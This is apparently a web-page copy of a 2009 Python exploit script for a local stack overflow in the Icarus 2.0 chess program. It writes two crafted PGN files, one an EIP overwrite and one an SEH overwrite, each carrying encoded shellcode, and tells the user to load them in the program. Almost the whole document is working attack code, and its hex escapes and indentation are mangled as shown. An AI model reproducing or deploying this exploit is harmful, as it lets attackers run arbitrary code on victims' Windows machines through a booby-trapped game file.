Home / os / win10

icarus-overflow.txt

Posted on 19 March 2009

#usage: exploit.py
print "********************************************************************"
print " Icarus 2.0 Local Stack Overflow Exploit
"
print " Download: http://www.randomsoftware.com/pub/icarus.exe"
print " Author : His0k4"
print " Tested on: Windows XP Pro SP2 Fr
"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)
"
print " Tip of the day: Klimontayne fe romayne :D"
print "********************************************************************

"


payload1 =   "x41" * 336
payload1 +=  "x5Dx38x82x7C" # call esp kernel32.dll (sp2)
payload1 +=  "x90" * 19 #some nops
payload1 +=  "x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x38"
payload1 +=  "x4exf9x9fx83xebxfcxe2xf4xc4xa6xbdx9fx38x4ex72xda"
payload1 +=  "x04xc5x85x9ax40x4fx16x14x77x56x72xc0x18x4fx12xd6"
payload1 +=  "xb3x7ax72x9exd6x7fx39x06x94xcax39xebx3fx8fx33x92"
payload1 +=  "x39x8cx12x6bx03x1axddx9bx4dxabx72xc0x1cx4fx12xf9"
payload1 +=  "xb3x42xb2x14x67x52xf8x74xb3x52x72x9exd3xc7xa5xbb"
payload1 +=  "x3cx8dxc8x5fx5cxc5xb9xafxbdx8ex81x93xb3x0exf5x14"
payload1 +=  "x48x52x54x14x50x46x12x96xb3xcex49x9fx38x4ex72xf7"
payload1 +=  "x04x11xc8x69x58x18x70x67xbbx8ex82xcfx50xbex73x9b"
payload1 +=  "x67x26x61x61xb2x40xaex60xdfx2dx98xf3x5bx4exf9x9f"
junk     =   "xCC"*7000


payload2 =	 "x5Bx46x6Fx72x6Dx61x74x20x22x4Cx65x63x74x75x72x65x22x5D"
payload2 +=  "x0Ax5Bx54x69x74x6Cx65x20x22x65x78x70x6Cx6Fx69x74x22x5D"
payload2 +=  "x0Ax0A"
payload2 +=  "x41"*788
payload2 +=  "xEBx06x90x90" # jmp +6
payload2 +=  "xE9x10x37x01" # universal pop pop ret
payload2 +=  "x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x38"
payload2 +=  "x4exf9x9fx83xebxfcxe2xf4xc4xa6xbdx9fx38x4ex72xda"
payload2 +=  "x04xc5x85x9ax40x4fx16x14x77x56x72xc0x18x4fx12xd6"
payload2 +=  "xb3x7ax72x9exd6x7fx39x06x94xcax39xebx3fx8fx33x92"
payload2 +=  "x39x8cx12x6bx03x1axddx9bx4dxabx72xc0x1cx4fx12xf9"
payload2 +=  "xb3x42xb2x14x67x52xf8x74xb3x52x72x9exd3xc7xa5xbb"
payload2 +=  "x3cx8dxc8x5fx5cxc5xb9xafxbdx8ex81x93xb3x0exf5x14"
payload2 +=  "x48x52x54x14x50x46x12x96xb3xcex49x9fx38x4ex72xf7"
payload2 +=  "x04x11xc8x69x58x18x70x67xbbx8ex82xcfx50xbex73x9b"
payload2 +=  "x67x26x61x61xb2x40xaex60xdfx2dx98xf3x5bx4exf9x9f"
payload2 +=  "xCC"*7000



try:
out_file = open("exploit_eip.PGN",'w')
out_file.write(payload1+junk)
out_file.close()
print "Eip exploit File Created!
Now you can run this file directly
"
except:
print "Error"
try:
out_file = open("exploit_seh.PGN",'w')
out_file.write(payload2)
out_file.close()
print "Seh exploit File Created!
Open Icarus then game>load and chose exploit_seh.PGN
"
except:
print "Error"

 

TOP

Malware :

Exploits :